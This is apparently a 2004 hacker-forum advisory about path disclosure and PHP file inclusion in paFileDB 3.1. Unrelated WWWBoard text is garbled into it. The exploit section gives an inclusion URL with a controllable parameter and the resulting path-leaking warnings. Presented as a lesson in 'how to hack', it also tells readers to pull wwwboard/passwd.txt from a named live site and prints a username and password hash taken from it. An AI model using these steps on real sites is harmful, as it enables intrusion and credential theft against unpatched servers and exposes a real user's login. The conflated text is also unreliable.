[Persianhacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final WWWBoard is a threaded World Wide Web discussion forum and message board, which allows users to post new messages, followup to existing ones and more. The current release in 2.0 ALPHA 2.1, which means there still are a few bugs. WWWBoard 2.0 ALPHA 2.1 comes with a WWWAdmin program, which helps you maintain the WWWBoard. ALPHA 2.1 has several security patches over ALPHA 2, which prevent board clobbering by followup fields. More info @: http://www.phparena.net/pafiledb.php Discussion: -------------------- What is the bug ? There is a Full Path Disclosure vulnerability in Pafiledb 3.1 which ends to disclosure of page local location on the web server.There is nother bug which let`s h4cK3r inject php codes and run them on server. Where is the bug ? At line 25 of pafiledb.php : [ if ($login == "do") { include "./includes/$action/login.php"; exit; } ] as we see $action is used in above statement and it`s not declared yet so h4ck3r can use it for PHP Injection attacks by passing his malicouse string from URL . Exploit: -------------------- its very easy expolit and here we will learn how to hack from it put "wwwboard/passwd.txt" after the url exampel www.xxx.comwwwboard/passwd.txt and here is the real exampel http://www.boardprep.net/wwwboard/passwd.txt and you will see the user name and passwaord in md5 usernameassword cknouse:aexMVWnDOyrdE [ http://www.example.com/pafiledb.php?login=do&action=[value] ] which includes PHP codes in : [ ./includes/[value]/login.php ] and if PHP page doesn`t realy exist at that address , server returns warring page like this : [ Warning: main(./includes/value/login.php): failed to open stream: No such file or directory in /home/host/public_html/downloads/pafiledb.php on line 25 Warning: main(./includes/value/login.php): failed to open stream: No such file or directory in /home/host/public_html/downloads/pafiledb.php on line 25 Warning: main(): Failed opening './includes/value/login.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/host/public_html/downloads/pafiledb.php on line 25 ] and this message shows local address of pafiledb.php on server. Solution: -------------------- There is no solution at this time. Credit: -------------------- Discovered by PersianHacker.NET Security Team by amironline452 (d3vilbox yahoo com) http://www.PersianHacker.NET Help -------------------- visit: http://www.PersianHacker.NET or mail me @: d3vilbox yahoo com Note -------------------- Script authors not contacted. Posted: Tue Dec 21, 2004 5:03 pm Post subject: how to hack site from wwwboard
